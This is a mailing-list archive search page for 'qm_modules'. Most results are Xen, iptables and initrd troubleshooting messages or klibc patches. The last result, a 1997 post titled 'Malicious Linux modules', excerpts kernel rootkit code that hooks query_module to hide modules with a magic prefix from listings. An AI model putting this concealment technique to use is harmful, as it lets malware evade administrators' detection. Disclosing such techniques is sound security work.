Displaying 10 results from an estimated 10 matches for "qm_modules".
Did you mean:
pam_modules
2009 Feb 19
4
iptables & kernel problems on Debian domU
Hi,
I have a Debian 4.0 XEN dom, which is giving me some strange errors on
the kernel when I try and use iptables, as such:
stats:/etc/snmp# iptables -L -v
Note: /etc/modules.conf is more recent than
/lib/modules/2.6.18-8.1.15.el5xen/modules.dep
modprobe: QM_MODULES: Function not implemented
modprobe: QM_MODULES: Function not implemented
modprobe: Can''t locate module ip_tables
iptables v1.3.6: can''t initialize iptables table `filter'': iptables
who? (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
Whe...
2005 Jun 22
5
network (NAT?) problem
Hello,
my current network setup looks like the following:
dom2-eth0 (172.30.1.22) netmask /24
|
| xen-br1 (no ip)
|
dom1-eth0 (172.30.1.21) netmask /24
dom1-eth1 (172.30.0.21) netmask /24
|
| xen-br10 (172.30.0.1) netmask /24
|
dom0
|
| xen-br0 (normal IP)
|
eth0 (same IP as xen-br0)
|
2006 Apr 06
1
modules.dep not found
Hello,
I am running xen-3.0.1-4 (installed via RPM) on Fedora Core 5 and when
trying to boot a guest domain I get the following error message
modprobe: Can''t open dependencies file
/lib/modules/2.6.16-1.2080_FC5xenU/modules.dep (No such file or directory)
modprobe: QM_MODULES: Function not implemented
Should I have manually copied this directory over from domain0? Any ideas?
Thanks,
Duncan
_______________________________________________
Xen-users mailing list
Xen-users@lists.xensource.com
http://lists.xensource.com/xen-users
2005 Apr 06
4
Query on Initramfs' and Initrd's coexistence
...m facing problems in trying
to run the 'linuxrc'.
Following are the issues:
1. I mount the initrd from the initramfs and exceve 'linuxrc'.
It starts executing linuxrc, but gives the following errors and panics:
Red hat nash version 3.4.42 starting
Loading jbd.o modules
insmod: QM_MODULES
ERROR: /bin/insmod exited abnormally!
Loading ext3.o module
insmod: QM_MODULES:
ERROR: /bin/insmod exited abnormally!
Mounting /proc filesystem
Creating block devices
failed to create /dev/hda
failed to create /dev/hda1
failed to create /dev/hda2
Creating root device
mkrootdev: mknod failed: 30
M...
2005 Oct 18
3
Not able to get eth0 up on domU.
...aldomain 2.6.11.12-xen0 #1 Thu Aug 4 00:45:12 BST
2005 i686 i686 i386 GNU/Linux
If I try to set iptable rules on the Host OS I get following:
==============================================
iptables -A FORWARD -m physdev --physdev-in eth0 --physdev-out ''!'' eth0
-j ACCEPT
modprobe: QM_MODULES: Function not implemented
modprobe: QM_MODULES: Function not implemented
modprobe: Can''t locate module ip_tables
iptables v1.2.8: can''t initialize iptables table `filter'': iptables who?
(do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.
===...
2003 Nov 26
1
[PATCH] use 2.6 module syscalls in klibc
...Bits of module.flags. */
-
-#define MOD_UNINITIALIZED 0
-#define MOD_RUNNING 1
-#define MOD_DELETED 2
-#define MOD_AUTOCLEAN 4
-#define MOD_VISITED 8
-#define MOD_USED_ONCE 16
-#define MOD_JUST_FREED 32
-#define MOD_INITIALIZING 64
-
-/* Values for query_module's which. */
-
-#define QM_MODULES 1
-#define QM_DEPS 2
-#define QM_REFS 3
-#define QM_SYMBOLS 4
-#define QM_INFO 5
-
-/* Can the module be queried? */
-#define MOD_CAN_QUERY(mod) (((mod)->flags & (MOD_RUNNING | MOD_INITIALIZING)) && !((mod)->flags & MOD_DELETED))
-
-/* When struct module is extended, we mus...
2003 Dec 18
2
Zaprtc compile error - virtual device for conferencing
Hi,
I don't have a zaptel device for conferencing.
I read from the lists, that
ztdummy and zaprtc need to be installed to get conferencing.
I could able to compile successfully with ztdummy and when i receive the
call it says,
-- Goto (13732,s,1)
-- Executing MeetMe("SIP/-08118800", "1234") in new stack
== Parsing
2002 Dec 23
1
klibc insmod for recent kernels
...Bits of module.flags. */
-
-#define MOD_UNINITIALIZED 0
-#define MOD_RUNNING 1
-#define MOD_DELETED 2
-#define MOD_AUTOCLEAN 4
-#define MOD_VISITED 8
-#define MOD_USED_ONCE 16
-#define MOD_JUST_FREED 32
-#define MOD_INITIALIZING 64
-
-/* Values for query_module's which. */
-
-#define QM_MODULES 1
-#define QM_DEPS 2
-#define QM_REFS 3
-#define QM_SYMBOLS 4
-#define QM_INFO 5
-
-/* Can the module be queried? */
-#define MOD_CAN_QUERY(mod) (((mod)->flags & (MOD_RUNNING | MOD_INITIALIZING)) && !((mod)->flags & MOD_DELETED))
-
-/* When struct module is extended, we mus...
2007 Jun 22
10
Query
Hi all,
Can anybody tell me that wether I should install DIGIUM-TE120P card on redhat9.0 2.4.20-8 or 2.6.18 kernel. I am using kernel 2.6.18 but facing a very serious problem of modutils and iptable.
Can anybody help me out.
Thanx and Regards
sanchal singh
1997 Oct 08
5
Malicious Linux modules
...#39;')
ptr++;
ptr++;
}
return(res);
}
int hacked_query_module(const char *name, int which, void *buf, size_t bufsize, size_t *ret)
{
int res;
int cnt;
char *ptr, *match;
res = (*original_query_module)(name, which, buf, bufsize, ret);
if(res == -1)
return(-errno);
if(which != QM_MODULES)
return(res);
ptr = buf;
for(cnt = 0; cnt < *ret; cnt++) {
if(!mystrcmp(MAGIC_PREFIX, ptr)) {
match = ptr;
while(*ptr)
ptr++;
ptr++;
mybcopy(ptr, match, bufsize - (ptr - (char *)buf));
(*ret)--;
return(res);
}
while(*ptr)
ptr++;
ptr++;
}
return(res);
}...